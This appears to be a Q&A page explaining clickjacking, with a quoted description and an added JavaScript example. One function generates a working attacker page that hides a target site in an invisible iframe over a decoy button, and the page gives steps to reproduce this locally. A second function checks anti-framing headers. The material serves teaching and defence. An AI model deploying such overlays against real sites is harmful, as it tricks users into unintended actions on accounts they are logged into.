I heard someone mention that, in theory, an invisible iframe can be placed on top of content and receive whatever input someone meant to put into a form. How is this possible without arousing suspicion? It scares me...
Solution
Yes, this is possible! It is called clickjacking, and it is very real. See this for more information:
http://en.wikipedia.org/wiki/Clickjacking
Google's Michal Zalewski has a theoretical example (source: Page 1, Page 2):
"A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies," Zalewski said in a message to a mailing list on Thursday. "The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items,' 'click to add Bob as a friend,' etc. It may then provide [its] own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."
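The overlay Zalewski describes, as an added example that is not part of the original answer or of his post: the first function builds the attacker's page in domain A, drawing a decoy button and positioning a fully transparent IFRAME of domain B on top of it so that B's real "delete all items" button sits exactly under the decoy (the click reaches B, the user sees A). The second function is the check a defender wants: given the response headers domain B sends, does `X-Frame-Options` or the CSP `frame-ancestors` directive stop A from framing it? The target URL, the button coordinates and the header values are constructed assumptions, and the CSP source matching is simplified to exact-origin comparison.

```javascript
// Added example, not code from the original page. All URLs, offsets and
// header values below are constructed for illustration.

// Attacker page in domain A: a visible decoy plus an invisible IFRAME of
// domain B shifted so that B's real button lands exactly under the decoy.
// targetButton = where the real button lies inside B's page (assumed),
// decoy = where the decoy is drawn inside A's page.
function buildClickjackPage({ targetUrl, targetButton, decoy }) {
  // Offset the frame so targetButton's top-left maps onto decoy's top-left.
  const left = decoy.x - targetButton.x;
  const top = decoy.y - targetButton.y;
  return `<!doctype html>
<html><head><style>
  #decoy { position:absolute; left:${decoy.x}px; top:${decoy.y}px;
           width:${targetButton.w}px; height:${targetButton.h}px; }
  /* Transparent frame stacked ABOVE the decoy: clicks go to domain B. */
  #victim { position:absolute; left:${left}px; top:${top}px;
            width:1200px; height:900px; opacity:0; border:0; z-index:2; }
</style></head><body>
  <button id="decoy">Click to claim your prize</button>
  <iframe id="victim" src="${targetUrl}"></iframe>
</body></html>`;
}

// Defender-side check: does the target's response forbid framing by
// framerOrigin? CSP frame-ancestors, when present, overrides X-Frame-Options.
// Source matching is simplified to exact origins; 'self', 'none' and '*'
// are handled. ALLOW-FROM is not honoured by current browsers and is
// treated as no protection.
function framingBlocked(headers, framerOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const csp = h['content-security-policy'];
  if (csp) {
    const dir = csp.split(';').map(s => s.trim())
      .find(s => s.toLowerCase().startsWith('frame-ancestors'));
    if (dir) {
      const sources = dir.split(/\s+/).slice(1)
        .map(s => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return true;
      if (sources.includes('*')) return false;
      if (sources.includes('self') && framerOrigin === targetOrigin) return false;
      if (sources.includes(framerOrigin.toLowerCase())) return false;
      return true; // framer not listed, so the browser refuses to render
    }
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return true;
  if (xfo === 'SAMEORIGIN') return framerOrigin !== targetOrigin;
  return false; // no usable header: any page may frame this response
}

// Stand-alone demo with constructed values.
const attackerPage = buildClickjackPage({
  targetUrl: 'https://b.example/settings',   // assumed target
  targetButton: { x: 400, y: 500, w: 120, h: 32 },
  decoy: { x: 100, y: 200 },
});
console.log(attackerPage);
console.log('DENY blocks A:',
  framingBlocked({ 'X-Frame-Options': 'DENY' }, 'https://a.example', 'https://b.example'));
console.log('No header blocks A:',
  framingBlocked({}, 'https://a.example', 'https://b.example'));
```

To reproduce the attack locally, serve the generated HTML from one origin and a page with a button from another; with `opacity:0` removed you can see the alignment, with it restored the click lands on the framed button while the user sees only the decoy. Shipping `Content-Security-Policy: frame-ancestors 'none'` (plus `X-Frame-Options: DENY` for older browsers) on domain B makes `framingBlocked` return true for every foreign framer.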